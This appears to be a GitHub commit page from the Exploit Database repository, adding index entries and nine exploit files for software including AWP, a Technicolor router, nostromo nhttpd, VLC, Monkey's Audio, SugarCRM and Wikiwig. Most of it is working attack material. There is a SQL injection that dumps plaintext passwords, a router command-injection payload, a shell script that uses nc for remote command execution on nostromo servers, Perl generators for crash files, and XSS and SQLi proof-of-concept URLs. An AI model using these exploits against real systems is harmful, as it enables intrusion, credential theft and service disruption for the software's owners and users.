Skip to content

Commit bf02311

Browse files
author
Offensive Security
committed
Updated 12_06_2014
1 parent 8fcd7ed commit bf02311

10 files changed

Lines changed: 240 additions & 0 deletions

File tree

files.csv

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -31937,3 +31937,12 @@ id,file,description,date,author,platform,type,port
3193731937
35456,platforms/php/webapps/35456.txt,"BoutikOne rss_promo.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
3193831938
35457,platforms/php/webapps/35457.txt,"BoutikOne rss_top10.php lang Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
3193931939
35459,platforms/php/webapps/35459.txt,"Cart66 Lite WordPress Ecommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80
31940+
35462,platforms/hardware/webapps/35462.txt,"Technicolor DT5130 V2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80
31941+
35463,platforms/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection Vulnerability",2014-12-04,"Robert Cooper",cgi,webapps,80
31942+
35464,platforms/multiple/remote/35464.txt,"Trend Micro WebReputation API 10.5 URI Security Bypass Vulnerability",2011-03-14,"DcLabs Security Research Group",multiple,remote,0
31943+
35465,platforms/multiple/remote/35465.pl,"VLC Media Player 1.0.5 '.ape' File Denial of Service Vulnerability",2011-03-15,KedAns-Dz,multiple,remote,0
31944+
35466,platforms/linux/remote/35466.sh,"nostromo nhttpd 1.9.3 Directory Traversal Remote Command Execution Vulnerability",2011-03-05,"RedTeam Pentesting GmbH",linux,remote,0
31945+
35467,platforms/php/webapps/35467.txt,"SugarCRM <= 6.1.1 Information Disclosure Vulnerability",2011-03-15,"RedTeam Pentesting GmbH",php,webapps,0
31946+
35468,platforms/windows/remote/35468.pl,"Monkey's Audio '.ape' File Buffer Overflow Vulnerability",2011-03-16,KedAns-Dz,windows,remote,0
31947+
35469,platforms/php/webapps/35469.txt,"Wikiwig 5.01 Cross Site Scripting and HTML Injection Vulnerabilities",2011-03-10,"AutoSec Tools",php,webapps,0
31948+
35470,platforms/php/webapps/35470.txt,"AplikaMedia CMS 'page_info.php' SQL Injection Vulnerability",2011-03-16,H3X,php,webapps,0

platforms/cgi/webapps/35463.txt

Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
# Exploit Title: Advertise With Pleasure! (AWP) <= 6.6 - SQL Injection vulnerability
2+
# Date: 12/02/2014
3+
# Author: Robert Cooper (robertc[at]areyousecure.net)
4+
# Software Link: http://www.guruperl.net/products/awppro/
5+
# Tested on: [Linux/Windows 7]
6+
# Vulnerable Parameter: group_id=
7+
8+
##############################################################
9+
10+
PoC:
11+
12+
http://server/cgi/client.cgi?act=list_zone&group_id=1'
13+
14+
http://server/cgi/client.cgi?act=list_zone&group_id=1 union all select 1,2,group_concat(id,0x3a,login,0x3a,password,0x0a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from awp_ad_client--
15+
16+
(Passwords are stored in plaintext)
17+
18+
##############################################################
19+
20+
http://www.areyousecure.net
Lines changed: 24 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,24 @@
1+
Product: Wireless N ADSL 2/2+ Modem Router
2+
Firmware Version : V2.05.C29GV
3+
Modem Type : ADSL2+ Router
4+
Modem Vendor : Technicolor
5+
Model: DT5130
6+
7+
Bugs:
8+
1- Unauth Xss - CVE-2014-9142
9+
user=teste&password=teste&
10+
userlevel=15&refer=%2Fnigga.html&failrefer=/basicauth.cgi?index.html?failrefer=<script></script><script>alert('TESTE')</script>"%0A&login=Login&password=pass&refer=/index.html&user=teste&userlevel=15&login=Login
11+
12+
2- Arbitrari URL redirect - CVE-2014-9143
13+
failrefer=http://blog.dclabs.com.br&login=Login&password=
14+
pass&refer=/index.html&user=1&userlevel=15
15+
16+
3- Command Injection in ping field - CVE-2014-9144
17+
setobject_token=SESSION_CONTRACT_TOKEN_TAG%3D0123456789012345&setobject_ip=s1.3.6.1.4.1.283.1000.2.1.6.4.1.0%3Dwww.google.com.br|`id`&setobject_ping=i1.3.6.1.4.1.283.1000.2.1.6.4.2.0%3D1&getobject_result=IGNORE
18+
19+
20+
--
21+
Ewerson Guimaraes (Crash)
22+
Pentester/Researcher
23+
DcLabs / Ibliss Security Team
24+
www.dclabs.com.br / www.ibliss.com.br

platforms/linux/remote/35466.sh

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
source: http://www.securityfocus.com/bid/46880/info
2+
3+
nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data.
4+
5+
An attacker can exploit this issue to access arbitrary files and execute arbitrary commands with application-level privileges.
6+
7+
nostromo versions prior to 1.9.4 are affected.
8+
9+
#!/bin/sh
10+
######################################
11+
# #
12+
# RedTeam Pentesting GmbH #
13+
# kontakt@redteam-pentesting.de #
14+
# http://www.redteam-pentesting.de #
15+
# #
16+
######################################
17+
18+
if [ $# -lt 3 ]; then
19+
echo "Usage: $(basename $0) HOST PORT COMMAND..."
20+
exit 2
21+
fi
22+
23+
24+
HOST="$1"
25+
PORT="$2"
26+
shift 2
27+
28+
( \
29+
echo -n -e 'POST /..%2f..%2f..%2fbin/sh HTTP/1.0\r\n'; \
30+
echo -n -e 'Content-Length: 1\r\n\r\necho\necho\n'; \
31+
echo "$@ 2>&1" \
32+
) | nc "$HOST" "$PORT" \
33+
| sed --quiet --expression ':S;/^\r$/{n;bP};n;bS;:P;n;p;bP'
Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/46864/info
2+
3+
Trend Micro WebReputation API is prone to a security-bypass vulnerability.
4+
5+
An attacker can exploit this issue to bypass the filter included in the download mechanism. Successful exploits may cause victims to download malicious files onto affected computers.
6+
7+
This issue affects WebReputation API 10.5; other versions may also be vulnerable.
8+
9+
http://www.example.com/dist/nmap-5.51-setup.exe?

platforms/multiple/remote/35465.pl

Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
source: http://www.securityfocus.com/bid/46868/info
2+
3+
VLC Media Player is prone to a denial-of-service vulnerability.
4+
5+
Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.
6+
7+
VLC Media Player 1.0.5 is vulnerable; other versions may also be affected.
8+
9+
#!/usr/bin/perl
10+
11+
###
12+
# Title : VLC media player v1.0.5 (.ape) Local Crash PoC
13+
# Author : KedAns-Dz
14+
# E-mail : ked-h@hotmail.com
15+
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
16+
# Twitter page : twitter.com/kedans
17+
# platform : Windows
18+
# Impact : VLC media player Just Crashed
19+
# Tested on : Windows XP SP3 Fran?ais
20+
# Target : VLC media player v1.0.5
21+
###
22+
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
23+
# ------------
24+
# Usage : 1 - Creat APE file ( Monkey's Audio Format )
25+
# => 2 - Open APE file With VLC 1.0.5
26+
# => 3 - Crashed !!!
27+
# ------------
28+
#START SYSTEM /root@MSdos/ :
29+
system("title KedAns-Dz");
30+
system("color 1e");
31+
system("cls");
32+
print "\n\n";
33+
print " |===========================================================|\n";
34+
print " |= [!] Name : VLC media player v1.0.5 (Monkey's File) =|\n";
35+
print " |= [!] Exploit : Local Crash PoC =|\n";
36+
print " |= [!] Author : KedAns-Dz =|\n";
37+
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
38+
print " |===========================================================|\n";
39+
sleep(2);
40+
print "\n";
41+
# Creating ...
42+
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header
43+
open(file , ">", "Kedans.ape"); # Evil File APE (16 bytes) 4.0 KB
44+
print file $PoC;
45+
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
46+
close(file);
47+
48+
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
49+
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
50+
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
51+
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
52+
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
53+
# [ Special Greets to '3em GE Class' & all 3Se Pupils , BACALORIA 2011 Enchallah
54+
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
55+
# Greets All My Friends (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
56+
# ThanX : (hotturks.org) TeX * KadaVra ... all Muslimised Turkish Hackers .
57+
# ThanX to : Kelvin.Xgr (kelvinx.net) Vietnamese Hacker .
58+
#===============================================================================

platforms/php/webapps/35467.txt

Lines changed: 10 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,10 @@
1+
source: http://www.securityfocus.com/bid/46885/info
2+
3+
SugarCRM is prone to an information-disclosure vulnerability because it fails to restrict access to certain application data.
4+
5+
Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.
6+
7+
8+
http://www.example.org/sugarcrm/index.php?module=Accounts&action=ShowDuplicates
9+
10+
http://www.example.org/sugarcrm/index.php?module=Contacts&action=ShowDuplicates

platforms/php/webapps/35469.txt

Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/46888/info
2+
3+
Wikiwig is prone to a cross-site scripting vulnerability and an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
4+
5+
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
6+
7+
Wikiwig 5.01 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/wikiwig5.01/_wk/Xinha/plugins/SpellChecker/spell-check-savedicts.php?to_r_list=%3Cscript%3Ealert(0)%3C%2fscript%3E

platforms/php/webapps/35470.txt

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
source: http://www.securityfocus.com/bid/46896/info
2+
3+
AplikaMedia CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
4+
5+
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
6+
7+
http://www.example.com/page_info.php?id_brt=[Sql_injection]

platforms/windows/remote/35468.pl

Lines changed: 61 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,61 @@
1+
source: http://www.securityfocus.com/bid/46887/info
2+
3+
Monkeyâ??s Audio is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.
4+
5+
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
6+
7+
#!/usr/bin/perl
8+
9+
###
10+
# Title : Monkey's File Audio (All MPlayers) Buffer Overflow
11+
# Author : KedAns-Dz
12+
# E-mail : ked-h@hotmail.com
13+
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
14+
# Twitter page : twitter.com/kedans
15+
# platform : Windows
16+
# Impact : Overflow & Crash's
17+
# Tested on : Windows XP SP3 Fran?ais
18+
# Target : All Media Players
19+
###
20+
# Note : BAC 2011 Enchallah ( KedAns 'me' & BadR0 & Dr.Ride & Red1One & XoreR & Fox-Dz ... all )
21+
# ------------
22+
# File Home : (http://www.monkeysaudio.com)
23+
# Error's Detected :
24+
# Media Player Classic v6.4.9.1 [MonkeySource.ax !0x020451a6()!] >> http://1337day.com/exploits/15581 || By KedAns-Dz
25+
# JetAudio v5.1.5.2 [JFACMDec.dll !0x02FA1BBD()!] >> http://packetstormsecurity.org/files/view/99200/jetaudio5152ape-overflow.txt || By KedAns-Dz
26+
# KMPlayer 2.9.3 [MACDec.dll !0x??????()!] >> http://packetstormsecurity.org/files/view/99190/kmplayerape-overflow.txt || By KedAns-Dz
27+
# VLC media player v1.0.5 [axvlc.dll !0x??????()!] >> http://1337day.com/exploits/15595 || By KedAns-Dz
28+
# QuickTime Player [Not Detected !!] ' Because Can not Read (APE) Files Format
29+
# RealPlayer [Not Detected !!] ' Because Can not Read (APE) Files Format
30+
# ------------
31+
#START SYSTEM /root@MSdos/ :
32+
system("title KedAns-Dz");
33+
system("color 1e");
34+
system("cls");
35+
print "\n\n";
36+
print " |======================================================|\n";
37+
print " |= [!] Name : Monkey's File Audio (.ape) All Players =|\n";
38+
print " |= [!] Exploit : Stack Buffer Overflow =|\n";
39+
print " |= [!] Author : KedAns-Dz =|\n";
40+
print " |= [!] Mail: Ked-h(at)hotmail(dot)com =|\n";
41+
print " |======================================================|\n";
42+
sleep(2);
43+
print "\n";
44+
# Creating ...
45+
my $PoC = "\x4D\x41\x43\x20\x96\x0f\x00\x00\x34\x00\x00\x00\x18\x00\x00\x00"; # APE Header (16 bytes)
46+
open(file , ">", "Kedans.ape"); # Evil File APE (4.0 KB)
47+
print file $PoC;
48+
print "\n [+] File successfully created!\n" or die print "\n [-] OpsS! File is Not Created !! ";
49+
close(file);
50+
51+
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
52+
# Special Greets to : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS >
53+
# Greets to All ALGERIANS EXPLO!TER's & DEVELOPER's :=> {{
54+
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz * His0k4 * Dr.0rYX
55+
# Cr3w-DZ * El-Kahina * Dz-Girl * SuNHouSe2 ; All Others && All My Friends . }} ,
56+
# [ Special Greets to 3 em EnGineering Electric Class , BACALORIA 2011 Enchallah
57+
# Messas Secondary School - Ain mlilla - 04300 - Algeria ] ,
58+
# Greets All Bad Boys (cit? 1850 logts - HassiMessaouD - 30008 -Algeria ) ,
59+
# hotturks.org : TeX * KadaVra ... all Others
60+
# Kelvin.Xgr ( kelvinx.net)
61+
#===========================================================================

0 commit comments

Comments
 (0)